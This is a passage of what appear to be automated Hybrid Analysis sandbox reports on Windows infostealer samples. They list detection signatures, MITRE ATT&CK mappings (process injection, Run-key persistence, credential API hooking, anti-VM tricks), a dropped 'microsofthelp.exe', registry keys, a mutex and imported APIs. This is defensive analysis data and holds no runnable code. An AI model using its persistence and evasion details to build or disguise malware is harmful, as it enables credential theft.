\"C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"upNext.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"upNext.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"upNext.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"upNext.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Environment Awareness", "identifier": "binary-8", "type": 8, "relevance": 5, "name": "The input sample contains a known anti-VM trick", "description": "Found VM detection artifact \"VMware trick\" in \"sample.bin\" (Offset: 570864)", "origin": "Binary File", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"upNext.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc
https://hybrid-analysis.com/sample/a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc
Hybrid Analysis - Infostealers
{"size": 87258, "type": "MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS", "submit_name": "a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc", "sha256": "a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc", "av_detect": 93, "vx_family": "Malware.SF.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "total_processes": 3, "total_signatures": 109, "extracted_files": [{"name": "microsofthelp.exe", "file_path": "%WINDIR%\\microsofthelp.exe", "file_size": 87518, "sha256": "4d908c51c82b5b2991cd16b8607977131fcbb1e74ea731a274533531a1ac542b", "type_tags": ["neexe", "executable"], "description": "MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS", "runtime_process": "microsofthelp.exe (PID: 5804)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "microsofthelp.exe.bin", "file_size": 87518, "sha256": "4d908c51c82b5b2991cd16b8607977131fcbb1e74ea731a274533531a1ac542b", "type_tags": ["neexe", "executable"], "description": "MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MICROSOFTHELP.EXE.67A47CD0.bin", "file_size": 87518, "sha256": "4d908c51c82b5b2991cd16b8607977131fcbb1e74ea731a274533531a1ac542b", "type_tags": ["neexe", "executable"], "description": "MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00006008", "name": "a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe", "normalized_path": "C:\\a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc.exe", "sha256": "a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc"}, {"uid": "00000000-00005804", "parentuid": "00000000-00006008", "name": "microsofthelp.exe", "normalized_path": "%WINDIR%\\microsofthelp.exe", "sha256": "4d908c51c82b5b2991cd16b8607977131fcbb1e74ea731a274533531a1ac542b"}, {"uid": "00000000-00000964", "name": "microsofthelp.exe", "normalized_path": "%WINDIR%\\microsofthelp.exe", "sha256": "4d908c51c82b5b2991cd16b8607977131fcbb1e74ea731a274533531a1ac542b"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 11}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 4, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")\n Found reference to API \"2690136044,5880,3139,,CreateProcessA,kernel32.dll,\"252:02:37.453\",RX=0,PX=0\" (Indicator: \"CreateProcess\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00000964.00000001.77126.00409000.00000080.mdmp\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\n \"Software\\motherFucker\" in Source: a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\n \"Software\\Policies\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00000964.00000001.77126.002B0000.00000004.mdmp\n \"Software\\Policies\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00005804.00000001.67745.005F0000.00000004.mdmp\n 00000000-00005804.00000002.69667.005F0000.00000004.mdmp\n 00000000-00005804.00000003.75108.005F0000.00000004.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00006008.00000000.65743.002C0000.00000004.mdmp\n \"Software\\motherFucker\" in Source: 00000000-00006008.00000000.65743.002C0000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"ShellExecuteExA\" (Indicator: \"ShellExecute\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API \"ShellExecuteExA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00006008.00000000.65743.002C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\pomdfghrt\"\n \"pomdfghrt\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"microsofthelp.exe.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\" file has an entrypoint instructions - \"push\t-1,push\t0x404611,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x630,push\tebx,push\tebp,push\tesi,push\tedi,mov\tecx, 0x40,xor\teax, eax,lea\tedi, [esp + 0x13d],mov\tbyte ptr [esp + 0x13c], 0,rep stosd\tdword ptr es:[edi], eax,stosw\tword ptr es:[edi], ax,stosb\tbyte ptr es:[edi], al,lea\teax, [esp + 0x13c],push\t0x104,push\teax,push\t0,call\tdword ptr [0x405050],lea\tecx, [esp + 0x14],call\t0x401e50,lea\tecx, [esp + 0x13c],push\t0,push\tecx,\"\n \"microsofthelp.exe.bin\" file has an entrypoint instructions - \"push\t-1,push\t0x404611,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x630,push\tebx,push\tebp,push\tesi,push\tedi,mov\tecx, 0x40,xor\teax, eax,lea\tedi, [esp + 0x13d],mov\tbyte ptr [esp + 0x13c], 0,rep stosd\tdword ptr es:[edi], eax,stosw\tword ptr es:[edi], ax,stosb\tbyte ptr es:[edi], al,lea\teax, [esp + 0x13c],push\t0x104,push\teax,push\t0,call\tdword ptr [0x405050],lea\tecx, [esp + 0x14],call\t0x401e50,lea\tecx, [esp + 0x13c],push\t0,push\tecx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"RegOpenKeyA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"RegSetValueExA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"RegCreateKeyA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"HeapFree\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetStdHandle\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"LCMapStringW\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"ReadFile\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"lstrcmpiA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetOEMCP\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"LCMapStringA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"IsBadWritePtr\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"RtlUnwind\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"HeapAlloc\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetFileSize\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"lstrcatA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"DeleteFileA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetCPInfo\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetProcessHeap\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"CreateMutexA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"CreateThread\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetStringTypeA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"FindFirstFileA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"IsBadCodePtr\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"WriteFile\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetACP\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"HeapReAlloc\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetStringTypeW\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"CreateProcessA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"FindClose\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"Sleep\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"IsBadReadPtr\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"CreateFileA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"wsprintfA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"InternetReadFile\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"InternetOpenA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"InternetSetOptionExA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetAdaptersInfo\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"GetActiveWindow\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"MessageBoxA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"ShellExecuteExA\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"VirtualAlloc\"; File: \"a146df795b94099d05fa2533760b4728cabee46d91f047d64776b91c9bf3c3fc\")\n Found reference to API (Indicator: \"VirtualFree\"; 